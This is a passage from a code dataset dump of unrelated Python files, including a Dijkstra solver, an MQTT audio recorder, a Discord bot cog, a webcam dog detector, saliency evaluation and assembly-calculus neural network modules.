')\n imprime_menor_caminho_formatado(menor_caminho)\n print('')\n vertice += 1\n\n def imprime_nmb_formatado(self):\n if self.get_b() == 0:\n texto = \"NÃO DIRECIONADO\"\n else:\n texto = \"DIRECIONADO\"\n print(f'{self.get_n()} {self.get_m()} {texto}')\n\n @classmethod\n def imprime_lista_de_adjacencias_formatada(cls):\n for origem in cls.listaDeAdjacencias:\n for (destino, peso) in cls.listaDeAdjacencias.get(origem):\n print(f'{origem.get_indice()} {destino.get_indice()} {peso}')\n\n def imprime_lista_de_adjacencias_de(self, vertice):\n print(f'Adjacencias do vertice {vertice}:')\n for adj, peso in self.listaDeAdjacencias.get(vertice):\n print(f'{adj} , peso: {peso}')\n\n @classmethod\n def obter_rot(cls):\n return cls.rot\n\n\nclass Vertice:\n def __init__(self, indice):\n self.__indice = indice\n # self.__nao_visitado = True\n\n def __str__(self): # ensina impressão informal\n return str(self.get_indice())\n\n def __eq__(self, other): # ensina comparar igualdade entre objetos desta instancia\n return self.get_indice() == other.get_indice()\n\n def __hash__(self): # codigo hash de objetos iguais precisa ser igual pra montar o dicionario corretamente\n return hash((self.get_indice()))\n\n def get_indice(self):\n return self.__indice\n\n\nclass Aresta:\n def __init__(self, origem, destino, peso):\n self.__origem = origem\n self.__destino = destino\n self.__peso = peso\n\n def get_origem(self):\n return self.__origem\n\n def get_destino(self):\n return self.__destino\n\n def get_peso(self):\n return self.__peso\n\n\ndef imprime_menor_caminho_formatado(menor_caminho):\n for v in menor_caminho:\n print(f'{v}', end=' ')\n\n\n# Entrada\nplinha = input()\nelemen = plinha.split(' ')\n\nn = int(elemen.pop(0))\nm = int(elemen.pop(0))\nb = int(elemen.pop(0))\ni = int(elemen.pop(0))\n\ngrafo = Grafo(n, m, b)\n\nfor mlinha in range(0, m):\n origem_destino_peso = input()\n valores = origem_destino_peso.split(' ')\n origem = int(valores.pop(0))\n destino = int(valores.pop(0))\n peso = int(valores.pop(0))\n grafo.adionar_aresta(Aresta(Vertice(origem), Vertice(destino), peso))\n\ngrafo.dijkstra(Vertice(i))\ngrafo.resposta_dijkstra_formatada()\n","sub_path":"dijkstra.py","file_name":"dijkstra.py","file_ext":"py","file_size_in_byte":7901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"488011911","text":"#!/usr/bin/env python\n\nfrom __future__ import print_function\n\nimport sys\nimport time\nimport getopt\nimport pickle\nimport alsaaudio\nimport paho.mqtt.client as mqtt\n\ndef usage():\n print('usage: recorder.py [-d ] [-h ]', file=sys.stderr)\n sys.exit(2)\n\nclass AudioMessage:\n def __init__(self, type):\n self.msg_type = type\n self.audio = \"\"\n\ndef sendaudio(source, client, starttime):\n mtype = 0\n while mtype != 2:\n l, data = source.read()\n if l:\n msg = AudioMessage(mtype)\n msg.audio = data\n if mtype == 1 and time.time() - starttime > 5:\n mtype = 2\n\n client.publish('/signal', pickle.dumps(msg, 2))\n if mtype == 0:\n mtype = 1\n else:\n time.sleep(.001)\n\nif __name__ == '__main__':\n\n device = 'default'\n host = 'localhost'\n\n opts, args = getopt.getopt(sys.argv[1:], 'd:h:')\n for o, a in opts:\n if o == '-d':\n device = a\n print(\"Device is: \"+device)\n if o == '-h':\n host = a\n print(\"Host is: \"+host)\n\n # print str(args)\n if args:\n usage()\n\n client = mqtt.Client()\n client.connect(host, 1883, 60)\n\n # Open the device in nonblocking capture mode. The last argument could\n # just as well have been zero for blocking mode. Then we could have\n # left out the sleep call in the bottom of the loop\n inp = alsaaudio.PCM(alsaaudio.PCM_CAPTURE, alsaaudio.PCM_NONBLOCK, device=device)\n\n # Set attributes: Mono, 44100 Hz, 16 bit little endian samples\n inp.setchannels(1)\n inp.setrate(44100)\n inp.setformat(alsaaudio.PCM_FORMAT_S16_LE)\n\n # The period size controls the internal number of frames per period.\n # The significance of this parameter is documented in the ALSA api.\n # For our purposes, it is suficcient to know that reads from the device\n # will return this many frames. Each frame being 2 bytes long.\n # This means that the reads below will return either 320 bytes of data\n # or 0 bytes of data. The latter is possible because we are in nonblocking\n # mode.\n inp.setperiodsize(160)\n\n client.loop_start()\n\n loops = 500\n while loops > 0:\n loops -= 1\n # Read data from device\n time.sleep(5)\n sendaudio(inp, client, time.time())\n\n client.loop_stop()\n","sub_path":"django/audiotrappola/mqtt/recorder.py","file_name":"recorder.py","file_ext":"py","file_size_in_byte":2372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"322191399","text":"import os \nfrom docx2pdf import convert\n\nfile_paths = [\n os.path.join(os.getcwd(), fname) for fname in os.listdir(\".\")\n if fname.endswith(\".docx\") and not fname.startswith(\"~$\")\n]\nprint(f\"Converting the following documents from .docx to .pdf:\\n\" + '\\n\\t'.join(file_paths))\nfor fpath in file_paths: \n convert(fpath, fpath.replace(\".docx\", \".pdf\"))","sub_path":"docx_to_pdf.py","file_name":"docx_to_pdf.py","file_ext":"py","file_size_in_byte":355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"36308248","text":"def genero(gen):\n i = True\n while i==True:\n if gen in (\"m\", \"masculino\"):\n msg = \"Masculino\"\n return msg\n elif gen in (\"f\", \"feminino\"):\n msg = \"Feminino\"\n return msg\n else:\n msg = \"Genero invalido, tente novamente!\"\n return msg\ngen = str(input(\"Informe seu sexo, sendo ele masculino/feminino: \"))\nprint (genero(gen))\n\n","sub_path":"decisao/ex3.py","file_name":"ex3.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"63865891","text":"# Copyright 2016 The TensorFlow Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\nr\"\"\"Generate captions for images using default beam search parameters.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport math\nimport os\nimport glob\nimport sys\nimport json\nimport os.path as osp\nimport scipy\nimport matplotlib.pyplot as plt\nimport matplotlib.colors as mcolors\nimport tensorflow as tf\nimport PIL.Image\nimport numpy as np\nsys.path.append('eval_att')\nfrom metrics import metrics\nimport glob\n\nfrom im2txt import configuration\nfrom im2txt import gradcam_wrapper\nfrom im2txt.inference_utils import vocabulary\n\ndef prepare_resize_saliency(grad_mask_2d, w, h):\n #grad_mask_2d_norm = grad_mask_2d / np.max(grad_mask_2d)\n #grad_mask_2d_upscaled = scipy.misc.imresize(grad_mask_2d_norm, (w, h), interp='bilinear', mode='F') \n #percentile = 99\n #vmax = np.percentile(grad_mask_2d_upscaled, percentile)\n #vmin = np.min(grad_mask_2d_upscaled)\n #mask_grayscale_upscaled = np.clip((grad_mask_2d_upscaled - vmin) / (vmax - vmin), 0, 1)\n grad_mask_2d_upscaled = scipy.misc.imresize(grad_mask_2d, (w, h), interp='bilinear', mode='F')\n return grad_mask_2d_upscaled #mask_grayscale_upscaled\n\ndef transparent_cmap(cmap, N=255):\n \"Copy colormap and set alpha values\"\n\n mycmap = cmap\n mycmap._init()\n mycmap._lut[:,-1] = np.linspace(0, 0.8, N+4)\n return mycmap\n\nFLAGS = tf.flags.FLAGS\n\ntf.flags.DEFINE_string(\"checkpoint_path\", \"\",\n \"Model checkpoint file or directory containing a \"\n \"model checkpoint file.\")\ntf.flags.DEFINE_string(\"vocab_file\", \"\", \"Text file containing the vocabulary.\")\ntf.flags.DEFINE_string(\"dump_file\", \"\", \"Text file containing the vocabulary.\")\n#tf.flags.DEFINE_string(\"input_files\", \"\",\n# \"File pattern or comma-separated list of file patterns \"\n# \"of image files.\")\ntf.flags.DEFINE_string(\"model_name\", \"\", \"Model name equivalebt to the JSON prediction file.\")\ntf.flags.DEFINE_string(\"img_path\", \"\", \"Text file containing image IDs.\")\ntf.flags.DEFINE_string(\"save_path\", \"\", \"Path to the location where outputs should be saved.\")\n\ntf.logging.set_verbosity(tf.logging.INFO)\n\ncoco_dir = 'im2txt/data/mscoco/'\ndataType = 'val2014'\ncocoImgDir = '{}/images/{}/'.format(coco_dir, dataType)\ncoco_masks = '{}/masks/{}/'.format(coco_dir, dataType)\n\nW = -1 # -1 8 32\nH = -1 # -1 8 32\n\nexclude = [] # 'man', 'woman', 'person'\n#exclude = ['_person']\n#exclude = ['_person', '_man']\n#exclude = ['_person', '_woman']\n#exclude = ['_man']\n#exclude = ['_woman']\n\ndef main(_):\n import ipdb\n #ipdb.set_trace()\n\n save_path = osp.join(FLAGS.save_path, osp.basename(FLAGS.model_name)+'_gt')\n\n # Create the vocabulary.\n vocab = vocabulary.Vocabulary(FLAGS.vocab_file)\n man_id = vocab.word_to_id('man')\n woman_id = vocab.word_to_id('woman')\n #person_id = vocab.word_to_id('person')\n\n of = open(FLAGS.img_path, 'r')\n image_ids = of.read().split('\\n')\n if image_ids[-1] == '':\n image_ids = image_ids[0:-1]\n\n json_path = 'im2txt/data/mscoco/annotations/captions_val2014.json'\n json_data = json.load(open(json_path, 'r'))\n json_dict = {}\n for entry in json_data['annotations']:\n image_id = entry['image_id']\n if str(image_id) not in image_ids: continue\n if image_id not in json_dict:\n caption = entry['caption']\n caption = caption.lower()\n tokens = caption.split(' ') \n if '-man' in FLAGS.img_path: look_for = 'man'\n elif '-woman' in FLAGS.img_path: look_for = 'woman'\n else: assert(False)\n if look_for in tokens:\n json_dict[image_id] = entry['caption']\n if len(json_dict) == 500: break\n\n image_ids = json_dict.keys()\n\n emd_sum = 0\n spear_sum = 0\n rank_sum = 0\n iou_sum = 0\n pointing_sum = 0\n\n global_count = 0\n for i, image_id in enumerate(image_ids):\n image_id = int(image_id)\n #sys.stdout.write('\\r%d/%d' %(i, len(image_ids)))\n filename = 'im2txt/data/mscoco/images/val2014/COCO_val2014_' + \"%012d\" % (image_id) +'.jpg'\n\n #input_image = PIL.Image.open(filename)\n #input_image = input_image.convert('RGB') \n #im = np.asarray(input_image)\n #im_resized = scipy.misc.imresize(im, (W, H), interp='bilinear', mode=None) \n #im_resized = im_resized / 127.5 - 1.0\n #w = im_resized.shape[0]\n #h = im_resized.shape[1]\n #y, x = np.mgrid[0:h, 0:w]\n #mycmap = transparent_cmap(plt.cm.jet)\n\n coco_mask_file = '%s/COCO_%s_%012d.npy' %(coco_masks, dataType, image_id)\n coco_mask = np.load(coco_mask_file)\n if np.sum(coco_mask) == 0: \n # no person mask\n continue\n if W > 0:\n coco_mask_resized = scipy.misc.imresize(coco_mask, (W, H), interp='bilinear', mode=None)\n coco_mask_resized_notnormalized = coco_mask_resized.copy()\n coco_mask_resized_notnormalized = coco_mask_resized_notnormalized / 255.0\n coco_mask_resized = coco_mask_resized / float(np.sum(coco_mask_resized))\n\n #fig = plt.figure(frameon=False)\n #plt.imshow(coco_mask_resized)\n #plt.show()\n #plt.close()\n\n if image_id not in json_dict: \n continue\n caption = json_dict[image_id]\n caption = caption.lower()\n #print(caption)\n if caption[-1] == '.':\n caption = caption[0:-1] \n tokens = caption.split(' ')\n tokens.insert(0, '')\n encoded_tokens = [vocab.word_to_id(w) for w in tokens]\n man_ids = [i for i, c in enumerate(encoded_tokens) if c == man_id]\n woman_ids = [i for i, c in enumerate(encoded_tokens) if c == woman_id]\n #person_ids = [i for i, c in enumerate(encoded_tokens) if c == person_id]\n if not (man_ids or woman_ids): #or person_ids):\n # nothing to do\n continue\n else:\n files = glob.glob(save_path + \"/*COCO_val2014_\" + \"%012d*.npy\" % (image_id))\n for f in files:\n gradcam_file = f\n exclude_file = False\n for w in exclude:\n if w in gradcam_file:\n exclude_file = True\n break\n if exclude_file: continue\n saliency_mask = np.load(gradcam_file)\n if W > 0:\n mask_grayscale_upscaled = prepare_resize_saliency(saliency_mask, W, H)\n mask_grayscale_upscaled = mask_grayscale_upscaled / float(np.sum(mask_grayscale_upscaled))\n met = metrics.heatmap_metrics(coco_mask_resized,\n mask_grayscale_upscaled,\n gt_type='human', SIZE=(W,H))\n met_notnormalized = metrics.heatmap_metrics(coco_mask_resized_notnormalized,\n mask_grayscale_upscaled,\n gt_type='human', SIZE=(W,H))\n else:\n mask_grayscale_upscaled = prepare_resize_saliency(saliency_mask, coco_mask.shape[0], coco_mask.shape[1])\n mask_grayscale_upscaled = mask_grayscale_upscaled / float(np.sum(mask_grayscale_upscaled))\n met = metrics.heatmap_metrics(coco_mask,\n mask_grayscale_upscaled,\n gt_type='human', SIZE=coco_mask.shape)\n\n # Compute EMD\n if W>0 and W<16:\n emd_mean_score, emd_scores = met.earth_mover(distance='euclidean')\n emd_sum += emd_mean_score\n # Compute Spearman\n if W>0:\n spear_mean_score, spear_scores = met.spearman_correlation()\n spear_sum += spear_mean_score\n # Compute Rank correlation\n if W>0:\n rank_mean_score = met.mean_rank_correlation()\n rank_sum += rank_mean_score\n # Compute IOU\n if W>0:\n mean_iou = met_notnormalized.iou()\n iou_sum += mean_iou\n # pointing\n if W<0:\n #import ipdb; ipdb.set_trace()\n pointing_sum += met.pointing()#coco_mask.flatten()[np.argmax(mask_grayscale_upscaled.flatten())]\n global_count += 1\n print(\"\\ncount: %d\" % (global_count))\n #print(\"EMD: %.3f\" % float(emd_sum/global_count))\n #print(\"SPEAR: %.5f\" % float(spear_sum/global_count))\n #print(\"rank: %.5f\" % float(rank_sum/global_count))\n #print(\"iou: %.8f\" % float(iou_sum/global_count))\n print(\"pointing: %.3f\" % float(pointing_sum/global_count))\n #print(\"%.3f\\t%.5f\\t%.5f\\t%.8f\\t%d\" % (float(emd_sum/global_count), float(spear_sum/global_count),\n # float(rank_sum/global_count), float(iou_sum/global_count), global_count))\n\nif __name__ == \"__main__\":\n tf.app.run()\n","sub_path":"research/im2txt/im2txt/evaluate_saliency_with_gt.py","file_name":"evaluate_saliency_with_gt.py","file_ext":"py","file_size_in_byte":9016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"575004602","text":"\nimport cv2\nimport numpy as np\nimport math\nimport os\nimport sys\nimport datetime\nfrom PIL import Image\nsys.path.append('..')\nfrom cnn_detector.detector import Detector\nfrom cnn_detector.dnn_network import NetworkType\nimport tflearn\nimport time\n\n\nclass DogDetector():\n model_dir = 'models'\n # filename = 'cropped_dog_112_lenet_detector_112-112_100_128_lenet.model'\n # image_size = (112, 112)\n n_epoch = 100\n batch_size = 128\n threshold = 0.9\n\n def __init__(self):\n network_type = NetworkType.lenet.name\n # network_type = NetworkType.alex.name\n image_size = 112\n self.image_size = (image_size, image_size)\n detector = Detector(**{\n # 'filename': self.filename,\n 'run_id': 'cropped_dog_{}_{}_detector'.format(\n image_size, network_type),\n 'n_epoch': self.n_epoch,\n 'batch_size': self.batch_size,\n 'image_size': self.image_size,\n 'tensorboard_dir': 'tensorboard_log',\n 'checkpoint_dir': 'checkpoints',\n 'network_type': network_type})\n self.model = detector.load_model()\n # self.model = detector.generate_network()\n # self.model.load(\"{}/{}\".format(self.model_dir, self.filename))\n\n def detect(self, image: np.array):\n \"\"\" Detect dog from image.\n\n Args:\n image:\n\n Returns:\n\n \"\"\"\n image = Image.fromarray(image)\n image = Detector.center_crop(image)\n image = image.resize(self.image_size)\n pred_Y = self.model.predict([image])\n if pred_Y[0][0] > 0.5:\n print(pred_Y)\n if pred_Y[0][0] > self.threshold:\n print(\"Dog detected!\")\n return True\n else:\n return False\n\n def save(self, image: np.array):\n \"\"\" Save dog image.\n\n Args:\n image:\n\n Returns:\n\n \"\"\"\n print(\"Save dog image.\")\n cv2.imwrite('detected/detected_dog_{}.jpg'.format(\n datetime.datetime.now()), image)\n # image.save('detected/detected_dog_{}.jpg'.format(\n # datetime.datetime.now()\n # ))\n\n def capture(self):\n \"\"\" Capture image from webcam..\n\n Returns:\n\n \"\"\"\n video_capture = cv2.VideoCapture(0)\n WIDTH = 320\n HEIGHT = 240\n video_capture.set(cv2.CAP_PROP_FRAME_WIDTH, WIDTH)\n video_capture.set(cv2.CAP_PROP_FRAME_HEIGHT, HEIGHT)\n ex_detected = False\n continuous_detected_num = 0\n skipped_num = 0\n while True:\n time.sleep(0.5)\n ret, frame = video_capture.read()\n # cv2.imshow('frame', frame)\n\n detected = self.detect(frame)\n # Continuous detect management.\n if ex_detected and detected:\n continuous_detected_num += 1\n print(\"Dog continuous detected: {}\".format(\n continuous_detected_num))\n elif ex_detected or detected:\n pass\n else:\n continuous_detected_num = 0\n ex_detected = detected\n # Save skip management.\n if continuous_detected_num != 0 \\\n and math.fmod(math.log(continuous_detected_num, 2), 1) != 0:\n skipped_num += 1\n print(\"Skip saving: {}\".format(skipped_num))\n continue\n else:\n skipped_num = 0\n if detected:\n self.save(frame)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n video_capture.release()\n cv2.destroyAllWindows()\n\n\n\nif __name__ == '__main__':\n dog_detector = DogDetector()\n\n # image = Image.open('imgs/abyssinian_24.jpg')\n # dog_detector.detect(image)\n dog_detector.capture()\n\n\n","sub_path":"Detection/dog_detector/dog_detector.py","file_name":"dog_detector.py","file_ext":"py","file_size_in_byte":3811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"488555371","text":"import discord\nimport logging\nimport random\nfrom discord.ext import commands\n\n\nclass WhatCog(commands.Cog):\n\n def __init__(self, bot):\n self.bot = bot\n self.logger = logging.getLogger(__name__)\n\n @staticmethod\n async def get_previous_message(message: discord.Message):\n found = False\n tmp_msg = None\n async for msg in message.channel.history(limit=10):\n if found:\n tmp_msg = msg\n break\n if msg.content == message.content and msg.author == message.author:\n found = True\n\n return tmp_msg if found else None\n\n @staticmethod\n def has_embed(message: discord.Message):\n return len(message.embeds) > 0 or len(message.attachments) > 0\n\n @commands.Cog.listener()\n async def on_message(self, message):\n if message.author.id == 278888022555230208:\n return\n if message.content.strip().lower() == \"what\":\n previous = await self.get_previous_message(message)\n if previous is None:\n return\n if self.has_embed(previous):\n print('previous had embed')\n return\n else:\n # randomize it\n if random.random() > 0.2:\n return\n # normal code again\n msg = previous.content.replace('***', '').replace('**', '')\n msg = f'**{msg}**'.upper()\n await message.channel.send(msg)\n self.logger.info('%s - %s whatted in channel '\n '%s - %s. Content: %s' %\n (message.author,\n message.author.id,\n message.channel,\n message.channel.id,\n msg))\n\n\ndef setup(bot):\n bot.add_cog(WhatCog(bot))\n","sub_path":"cogs/what.py","file_name":"what.py","file_ext":"py","file_size_in_byte":1920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"596849920","text":"import com.ihsan.foundation.pobjecthelper as phelper\nimport time, sys, os\n\ndef FormSetDataEx(uideflist,parameters):\n config = uideflist.config\n PeranLogin = config.SecurityContext.GetUserInfo()[7].replace('\\n',\"','\")\n UserLogin = config.SecurityContext.InitUser\n\n sSQL = \"select employeeid from logincorporate where upper(login)='%s'\" % UserLogin\n useremployee = config.CreateSQL(sSQL).RawResult\n employeeid = useremployee.employeeid or ''\n\n uip = uideflist.uipart\n rec = uip.Dataset.AddRecord()\n rec.peran = \"'%s'\" % PeranLogin\n rec.empid = employeeid\n\ndef Reset(config,params,returnpacket):\n status = returnpacket.CreateValues(\n ['IsErr',0],\n ['ErrMessage',''],\n )\n recParam = params.FirstRecord\n config.BeginTransaction()\n try:\n sSQL = \"UPDATE offworkplafond SET previousyearplafond=0, ispreviousallowancetaken='T'\"\n res = config.ExecSQL(sSQL)\n\n config.Commit()\n except:\n config.Rollback()\n status.IsErr = 1\n status.ErrMessage = str(sys.exc_info()[1])\n\n\ndef RefreshPlafond(config,params,returnpacket):\n status = returnpacket.CreateValues(\n ['IsErr',0],\n ['ErrMessage',''],\n )\n recParam = params.FirstRecord\n config.BeginTransaction()\n def EncodeTgl(ED):\n tanggal =config.ModLibUtils.EncodeDate(int(ED[0]),int(ED[1]),int(ED[2]))\n return tanggal\n\n try:\n Emp =\"SELECT b.employeeid as empid,a.employeeid as NIK,a.employeeentrydate,b.currentyear,b.cutibesarbegin \"\n Emp +=\" FROM employee a LEFT OUTER JOIN offworkplafond b ON a.employeeid=b.employeeid WHERE a.isactive ='T' order by b.currentyear\"\n EFY = config.CreateSQL(Emp).RawResult\n EFY.First()\n\n tahun=EFY.currentyear\n TahunIni =config.Now()\n while not EFY.Eof:\n empid =EFY.empid\n tglmasuk = EncodeTgl(EFY.employeeentrydate)\n bulan = config.FormatDateTime('MM',tglmasuk)\n bln =12 - int(bulan)\n\n selisih = int((TahunIni-tglmasuk) / 365)\n if empid in (None,''):\n if (selisih >=1) and (selisih < 2):\n sSQL = \"insert into offworkplafond(employeeid,empid,currentyear,previousyearplafond,iscurrentallowancetaken,ispreviousallowancetaken, \"\n sSQL += \"iscutibesar, currentyearplafond,cutibesarbegin,allowance) VALUES ( \"\n sSQL += \"'%s','%s','%s',0,'F','T','T',%s,NULL,'(%s/12)*50' )\" % (EFY.NIK,EFY.NIK,tahun,bln,bln)\n\n res = config.ExecSQL(sSQL)\n\n EFY.Next()\n\n config.Commit()\n except:\n config.Rollback()\n status.IsErr = 1\n status.ErrMessage = str(sys.exc_info()[1])\n\n","sub_path":"dialogs/parameter/QryPlafondCuti_data.py","file_name":"QryPlafondCuti_data.py","file_ext":"py","file_size_in_byte":2538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"430534049","text":"import urllib.request\nimport sys\n\nfilepath = '/home/jesseik/advent/1/input'\nfrequency = 0\nfrequencies = []\n\nwhile True:\n with open(filepath) as f:\n for line in f:\n frequency += int(line)\n if int(frequency) in frequencies:\n print(\"found!\")\n print(frequency)\n sys.exit(0)\n \n frequencies.append(int(frequency))\n","sub_path":"1/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"339423383","text":"import csv\n\n\nclasses={}\n\nwith open('/mnt/data/dataset_stuff/openimages/class-descriptions.csv', 'r') as f:\n reader=csv.reader(f,delimiter=',')\n for row in reader:\n classes[row[0]]=row[1]\n\n\n\noutdata=\"\"\nlines=[]\nwith open('/mnt/data/dataset_stuff/openimages/classes-bbox-trainable.txt', 'r') as f:\n for line in f.readlines():\n dat=line.strip()\n outdata += dat + \",\" + classes[dat] + \"\\n\"\n\n\n\n\nwith open('/mnt/data/dataset_stuff/openimages/classes-bbox-trainable_labels.csv', 'w') as f:\n f.write(outdata)","sub_path":"tools/open_images_download.py","file_name":"open_images_download.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"171900008","text":"\"\"\" Adding fields in the declaration of a class and replace them by a parsed\nvalue.\n\"\"\"\n\n\nfrom .six import add_metaclass, iteritems\n\n\nclass FieldsMeta(type):\n \"\"\" Meta class allowing to configure fields at creation\n \"\"\"\n\n @classmethod\n def __new__(cls, meta_class, cls_name, cls_proto, cls_dict):\n try:\n field_cls = cls_dict['__field_cls__']\n except KeyError:\n print(\"No field class defined, use the @fields class decorator.\")\n else:\n for key, value in iteritems(cls_dict):\n if isinstance(value, field_cls):\n cls_dict[key] = value.parsed()\n\n return super(FieldsMeta, cls).__new__(meta_class,\n cls_name, cls_proto, cls_dict)\n\n\nclass Field(object):\n \"\"\" Member of a class that gets parsed and linked to its parent class at \n creation.\n \"\"\"\n\n def __init__(self):\n super(Field, self).__init__()\n\n def parsed(self):\n raise NotImplementedError('You must implement the \"parsed\" metod of ' +\n 'your fields.')\n\n\ndef fields(target_cls):\n \"\"\" Class decorator to link a class and its fields.\n \"\"\"\n def wrapper(cls):\n _add = add_metaclass(FieldsMeta)\n cls.__field_cls__ = target_cls\n return _add(cls)\n return wrapper\n","sub_path":"pyutils/fields.py","file_name":"fields.py","file_ext":"py","file_size_in_byte":1295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"214615774","text":"from collections import OrderedDict\nfrom string import ascii_uppercase\n\nimport torch\nimport torch.nn as nn\nfrom abc import ABC, abstractmethod\n\nfrom assembly.constants import K_ACTIVE\nfrom assembly.samplers import sample_bernoulli\nfrom mighty.utils.common import find_layers\n\n__all__ = [\n \"KWinnersTakeAll\",\n \"AreaRNNHebb\",\n \"AreaRNNWillshaw\",\n \"AreaStack\",\n \"AreaSequential\"\n]\n\n\nclass KWinnersTakeAll(nn.Module):\n \"\"\"\n K-winners-take-all activation function.\n\n Parameters\n ----------\n k_active : int, optional\n `k`, the number of active (winner) neurons within an output layer.\n Default: 50\n \"\"\"\n def __init__(self, k_active=K_ACTIVE):\n super().__init__()\n self.k_active = k_active\n\n def forward(self, x):\n \"\"\"\n The forward pass of kWTA.\n\n Parameters\n ----------\n x : (N,) torch.Tensor\n An input vector.\n\n Returns\n -------\n y : (N,) torch.Tensor\n The output vector ``y = kwta(x)`` with exactly :attr:`k` active\n neurons.\n\n \"\"\"\n winners = x.topk(k=self.k_active, sorted=False).indices\n y = torch.zeros_like(x)\n y[winners] = 1\n return y\n\n def extra_repr(self):\n return f\"k_active={self.k_active}\"\n\n\nclass AreaInterface(nn.Module, ABC):\n def recall(self, xs_stim):\n \"\"\"\n A forward pass without latent activations.\n\n Parameters\n ----------\n xs_stim : torch.Tensor or tuple of torch.Tensor\n Input vectors from the incoming areas.\n\n Returns\n -------\n y_out : torch.Tensor\n The output vector.\n \"\"\"\n mode = self.training\n self.eval()\n y_out = self(xs_stim)\n self.train(mode)\n return y_out\n\n def complete_from_input(self, xs_partial, y_partial=None):\n \"\"\"\n Complete the pattern from the partial input.\n\n Nothing more than a simple forward pass without updating the weights.\n\n Parameters\n ----------\n xs_partial : torch.Tensor or tuple of torch.Tensor\n Partially active input vectors from the incoming areas.\n y_partial : torch.Tensor or None, optional\n The stored latent (hidden activations) vector from the previous\n step with partial activations.\n Default: None\n\n Returns\n -------\n y_out : torch.Tensor\n The output vector.\n \"\"\"\n mode = self.training\n self.eval()\n y_out = self(xs_partial, y_latent=y_partial)\n self.train(mode)\n return y_out\n\n def memory_used(self):\n r\"\"\"\n Computes the used memory bits as\n :math:`\\frac{||W||_0}{\\text{size}(W)}`\n\n Returns\n -------\n dict\n A dictionary with used memory for each parameter (weight matrix).\n \"\"\"\n memory_used = {}\n for name, param in self.named_parameters():\n memory_used[name] = param.norm(p=0) / param.nelement()\n return memory_used\n\n def normalize_weights(self):\n \"\"\"\n Normalize the pre-synaptic weights sum to ``1.0``.\n\n Without the normalization, all inputs converge to the same output\n vector determined by the lateral weights because the sum\n ``w_xy @ x + w_lat @ y`` favors the second element. Normalization of\n the feedforward and lateral weights makes ``w_xy @ x`` and\n ``w_lat @ y`` of the same magnitude.\n \"\"\"\n for module in find_layers(self, layer_class=AreaRNN):\n for weight in module.parameters(recurse=False):\n # input and recurrent weights\n module._normalize_weight(weight)\n assert torch.isfinite(weight).all()\n\n\nclass AreaRNN(AreaInterface, ABC):\n def __init__(self, *in_features: int, out_features, p_synapse=0.05,\n recurrent_coef=1., sampler=sample_bernoulli):\n super().__init__()\n self.in_features = in_features\n self.out_features = out_features\n self.recurrent_coef = recurrent_coef\n self.weights_input = []\n for parent_id, neurons_in in enumerate(in_features):\n weight_in = nn.Parameter(\n sampler(out_features, neurons_in, proba=p_synapse),\n requires_grad=False)\n self.register_parameter(name=f\"weight_input{parent_id}\",\n param=weight_in)\n self.weights_input.append(weight_in)\n self.weight_recurrent = nn.Parameter(\n sampler(out_features, out_features, proba=p_synapse),\n requires_grad=False)\n self.kwta = KWinnersTakeAll()\n self.normalize_weights()\n\n def forward(self, xs_stim, y_latent=None):\n \"\"\"\n The forward pass :eq:`forward`.\n\n Parameters\n ----------\n xs_stim : torch.Tensor or tuple of torch.Tensor\n Input vectors from the incoming areas.\n y_latent : torch.Tensor or None, optional\n The stored latent (hidden activations) vector from the previous\n step.\n Default: None\n\n Returns\n -------\n y_out : torch.Tensor\n The output vector.\n\n \"\"\"\n if isinstance(xs_stim, torch.Tensor):\n xs_stim = [xs_stim]\n if xs_stim is None or all(x is None for x in xs_stim):\n return None\n assert len(xs_stim) == len(self.weights_input)\n y_out = torch.zeros(self.out_features)\n for x, w_in in zip(xs_stim, self.weights_input):\n if x is not None:\n y_out += w_in.matmul(x)\n if y_latent is not None:\n # y_out += alpha * W_rec @ y_latent\n y_out.addmv_(mat=self.weight_recurrent, vec=y_latent,\n alpha=self.recurrent_coef)\n y_out = self.kwta(y_out)\n if self.training:\n for x, w_in in zip(xs_stim, self.weights_input):\n if x is not None:\n self.update_weight(w_in, x=x, y=y_out)\n if y_latent is not None:\n self.update_weight(self.weight_recurrent, x=y_latent, y=y_out)\n return y_out\n\n def update_weight(self, weight, x, y):\n \"\"\"\n Update the weight, given the activations.\n\n Parameters\n ----------\n weight : torch.Tensor\n The weight to update.\n x, y : torch.Tensor\n Input and output vectors.\n \"\"\"\n pass\n\n @abstractmethod\n def _normalize_weight(self, weight):\n \"\"\"\n Normalize the pre-synaptic weight sum to ``1.0``.\n\n Parameters\n ----------\n weight : torch.Tensor\n A weight matrix.\n \"\"\"\n pass\n\n def complete_pattern(self, y_partial):\n \"\"\"\n Complete the pattern using the recurrent connections only.\n\n Parameters\n ----------\n y_partial : torch.Tensor\n A partially activated latent vector.\n\n Returns\n -------\n y : torch.Tensor\n The reconstructed vector `y`.\n \"\"\"\n y = 